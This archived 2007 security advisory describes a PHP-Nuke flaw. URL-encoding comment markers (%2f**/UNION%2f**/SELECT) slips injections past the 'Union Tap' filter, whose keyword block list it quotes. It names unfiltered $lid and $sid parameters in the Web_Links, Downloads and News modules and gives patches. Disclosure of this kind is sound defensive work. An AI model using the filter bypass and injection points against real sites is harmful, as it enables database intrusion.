phpnuke-bypass-sql.txt

phpnuke-bypass-sql.txt: Posted Apr 17, 2007; Authored by Aleksandar aka sale83; PHP-Nuke versions 8.0.0.3.3b and below suffer from a flaw that allows the SQL injection protection to be bypassed thus allowing for attacks. Details provided.; tags | exploit, php, sql injection, bypass; SHA-256 | e8ff03b9574af29c44c7061332f9fa9f8c0b900accd47af22c307553c80e497d; Download | Favorite | View

phpnuke-bypass-sql.txt

PHP Nuke <= 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities

________________________
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: All version
BUG: PHP Nuke <= 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities
AUTHOR: Aleksandar
________________________




Let's look at source code from mainfile.php line 435
__________________________________________

  //Union Tap
  //Copyright Zhen-Xjell 2004 http://nukecops.com
  //Beta 3 Code to prevent UNION SQL Injections
  unset($matches);
  unset($loc);
  if(isset($_SERVER['QUERY_STRING'])) {
    if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /", rawurldecode($loc=$_SERVER['QUERY_STRING']), $matches)) {
      die('Illegal Operation 1');
    }
  }
  if(!isset($admin) OR (isset($admin) AND !is_admin($admin))) {
    $queryString = $_SERVER['QUERY_STRING'];
  if (($_SERVER['PHP_SELF'] != "/index.php") OR !isset($url))
  {
     if (stristr($queryString,'http://')) die('Illegal Operation 2');
  }
    if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+'))  OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
      die('Illegal Operation 3');
    }
  }__________________________________________

So we can se different filters. :)

Let’s start whit a testing:

TEST 1
http://localhost/nuke/?/*
So we will se this message: Illegal Operation 3

TEST 2
http://localhost/nuke/?%2f*

Yeah - we got through :)

TEST 3
http://localhost/?%20UNION%20SELECT
 
Illegal Operation 1

TEST 4
http://localhost:8080/html80/?%2f**/UNION%2f**/SELECT ..

Yeah - we got through :)




PATCH:
__________________________________________

if ((stristr($queryString,'%20union%20')) OR (stristr($queryString,'*%2f*')) OR (stristr($queryString,'/*')) OR (stristr($queryString,'*/union/*')) OR (stristr($queryString,'c2nyaxb0')) OR (stristr($queryString,'+union+'))  OR ((stristr($queryString,'cmd=')) AND (!stristr($queryString,'&cmd'))) OR ((stristr($queryString,'exec')) AND (!stristr($queryString,'execu'))) OR (stristr($queryString,'concat'))) {
      die('Illegal Operation');
    }
__________________________________________



Multiple SQL Injection vulnerability in Web_Links, News and Download module



+++++++++++++++++++++++++++

PHP.ini
Magic Quotes = OFF 
Register Global = ON
+++++++++++++++++++++++++++


Now Let's look at source code from Web_Links/index.php:

Vulnerability function

function viewlinkcomments($lid) {
  global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
  include("header.php");
  include("modules/$module_name/l_config.php");
  menu(1);
  $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); // BUG ---> $lid
              $ttitle = filter($row['title'], "nohtml");
  $lid = intval(trim($lid)); //WTF?<===== lol ??????????????? :):):):):)
  echo "<br>";
...


How to fix:

Add $lid = intval(trim($lid)); before $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); 

___________________________________________
function viewlinkcomments($lid) {
  global $prefix, $db, $admin, $bgcolor2, $module_name, $admin_file;
  include("header.php");
  include("modules/$module_name/l_config.php");
  menu(1);
            $lid = intval(trim($lid)); // FIX
  $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_links_links WHERE lid='$lid'")); 
              $ttitle = filter($row['title'], "nohtml");
  //$lid = intval(trim($lid)); // REMOVE THIS LINE !!!!!!!
  echo "<br>";
...
__________________________________________________

Vulnerability Functions:

function viewlinkcomments($lid) {
function viewlinkeditorial($lid){
function viewlinkcomments($lid){
function ratelink($lid, $user) {

The "$lid" variable isn't filtered, so if we bypass the sql injection protection we can execute arbitrary sql commands.

SQL Injection vulnerability in Downloads
Vulnerability Functions:

function viewdownloadeditorial($lid) {
function viewdownloadcomments($lid) {
function ratedownload($lid, $user) {

The "$lid" variable isn't filtered , so if we bypass the sql injection protection we can execute arbitrary sql commands.


SQL Injection vulnerability in News
Vulnerability Function:

function rate_complete($sid, $rated=0, $score) {

The "$sid" variable isn't filtered , so if we bypass the sql injection protection we can execute arbitrary sql commands.

Best Regards
Aleksandar
Programmer and Web Developer

Top Authors In Last 30 Days

Red Hat 323 files
Ubuntu 71 files
Debian 21 files
LiquidWorm 12 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
Spencer McIntyre 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

phpnuke-bypass-sql.txt

phpnuke-bypass-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpnuke-bypass-sql.txt

Share This

phpnuke-bypass-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems